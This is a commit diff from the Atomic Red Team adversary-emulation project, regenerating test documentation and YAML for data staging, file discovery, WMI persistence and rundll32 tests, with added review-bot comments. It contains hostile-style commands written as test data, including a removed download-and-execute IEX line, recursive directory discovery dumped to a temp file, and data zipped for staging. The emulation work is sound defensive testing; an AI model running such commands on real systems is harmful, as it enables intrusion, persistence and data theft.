Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-04-03 15:04:00 +00:00
parent 7517911963
commit 3bc48cf815
7 changed files with 72 additions and 43 deletions
+22 -5
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
#### Attack Commands: Run with `powershell`!
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
#### Cleanup Commands:
```powershell
Remove-Item -Force #{output_file} -ErrorAction Ignore
```
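Review bot: the replacement of `IEX (New-Object Net.WebClient).DownloadString(...) > pi.log` with `Invoke-WebRequest ... -OutFile #{output_file}` is the right fix for this test: Invoke-Expression executes the downloaded batch content in PowerShell rather than saving it, so the old command never matched the description "download discovery.bat and save to a local file", and it left a stray pi.log that the cleanup did not remove. Two follow-ups: the new description still says "verify that the file is saved in the temp directory" although the location is now the `output_file` argument, so refer to `#{output_file}` instead; and the file is Discovery.bat in the URL but discovery.bat in the description and the default path, which only lines up because Windows paths are case-insensitive.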
@@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
<br/>
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074&#92;bin&#92;Folder_to_zip|
| output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
#### Attack Commands: Run with `powershell`!
```powershell
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
Remove-Item -Path #{output_file} -ErrorAction Ignore
```
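Review bot: "Verify" is capitalised mid-sentence in the new description, and the description names the fixed result `Folder_to_zip.zip` in the temp directory while the destination is now the `output_file` argument, so it should point at `#{output_file}`. Also, the `input_file` default `PathToAtomicsFolder\T1074\bin\Folder_to_zip` drops the `$` that the old command `Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip` used; confirm this is the placeholder the execution framework substitutes rather than a PowerShell variable, otherwise the path is taken literally and the test fails before staging anything.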
+3 -3
@@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code
<br/>
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
**Supported Platforms:** Windows
@@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
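Review bot: the line `dir /s d:\ >> %temp%\download` is dropped without a stated reason; if it is because a D: drive is usually absent on test hosts and the command only adds an error line, say so in the test description, which still promises that the output file contains "all of the data discovery commands". Note also that every command appends with `>>` to the same `%temp%\download`, so repeated runs accumulate output from earlier runs; a defender validating detection of this test should expect a growing file rather than a fresh one.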
@@ -55,7 +55,7 @@ tree /F >> %temp%\download
<br/>
## Atomic Test #2 - File and Directory Discovery (PowerShell)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
+4 -6
@@ -4,15 +4,14 @@
## Atomic Tests
- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
<br/>
## Atomic Test #1 - Persistence
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
## Atomic Test #1 - Persistence via WMI Event Subscription
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
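Review bot: only a blank line goes away in this hunk (the six visible cleanup lines are unchanged), so there is no behaviour change. The teardown order is the correct one: the `__FilterToConsumerBinding` is removed before the `CommandLineEventConsumer` and `__EventFilter` it references. Since the whole cleanup keys off the name `AtomicRedTeam-WMIPersistence-Example`, the doc could state that explicitly; it is also the artefact a defender should look for in `root/subscription` when validating that the test ran and was torn down.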
+1 -1
@@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
<br/>
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
Test execution of a remote script using rundll32.exe
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
+1 -1
@@ -141,7 +141,7 @@
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
+40 -26
@@ -5075,11 +5075,10 @@ persistence:
modified: '2019-10-15T18:43:47.703Z'
identifier: T1084
atomic_tests:
- name: Persistence
- name: Persistence via WMI Event Subscription
description: |
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -5111,7 +5110,6 @@ persistence:
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
@@ -11663,7 +11661,8 @@ defense-evasion:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
'
supported_platforms:
@@ -17338,9 +17337,9 @@ discovery:
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
description: 'Find or discover files on the file system
'
description: |
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
supported_platforms:
- windows
executor:
@@ -17350,13 +17349,13 @@ discovery:
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
tree /F >> %temp%\download
- name: File and Directory Discovery (PowerShell)
description: 'Find or discover files on the file system
description: 'Find or discover files on the file system. Upon execution, file
and folder information will be displayed.
'
supported_platforms:
@@ -23689,7 +23688,8 @@ execution:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
'
supported_platforms:
@@ -27306,17 +27306,24 @@ collection:
identifier: T1074
atomic_tests:
- name: Stage data from Discovery.bat
description: 'Utilize powershell to download discovery.bat and save to a local
file
'
description: |
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
supported_platforms:
- windows
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: Path
default: "$env:TEMP\\discovery.bat"
executor:
name: powershell
elevation_required: false
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
> pi.log
command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat"
-OutFile #{output_file}
'
cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
'
- name: Stage data from Discovery.sh
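Review bot: `#{output_file}` is substituted textually into `-OutFile #{output_file}` and `Remove-Item -Force #{output_file}` without quotes, so a user-supplied value containing spaces splits into two arguments; wrapping both as `"#{output_file}"` avoids that. The double-quoted YAML default `"$env:TEMP\\discovery.bat"` is fine, since `\\` unescapes to a single backslash and `$env:TEMP` is expanded by PowerShell at run time, not by YAML.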
@@ -27334,21 +27341,28 @@ collection:
'
- name: Zip a Folder with PowerShell for Staging in Temp
description: 'Use living off the land tools to zip a file and stage it in the
Windows temporary folder for later exfiltration.
'
description: |
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
supported_platforms:
- windows
input_arguments:
input_file:
description: Location of file or folder to zip
type: Path
default: PathToAtomicsFolder\T1074\bin\Folder_to_zip
output_file:
description: Location to save zipped file or folder
type: Path
default: "$env:TEMP\\Folder_to_zip.zip"
executor:
name: powershell
elevation_required: false
command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
-DestinationPath $env:TEMP\Folder_to_zip.zip
command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
-Force
'
cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
Ignore
cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
'
'':
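Review bot: the two defaults use different YAML quoting, plain `PathToAtomicsFolder\T1074\bin\Folder_to_zip` for `input_file` and double-quoted `"$env:TEMP\\Folder_to_zip.zip"` for `output_file`; both parse to the intended single-backslash paths, but one style across the test would be easier to maintain. The added `-Force` on `Compress-Archive` is worth keeping, since without it a second run fails when the archive from the previous run is still present, and the cleanup now correctly removes `#{output_file}` rather than the hard-coded path.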
+1 -1
@@ -339,7 +339,7 @@
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]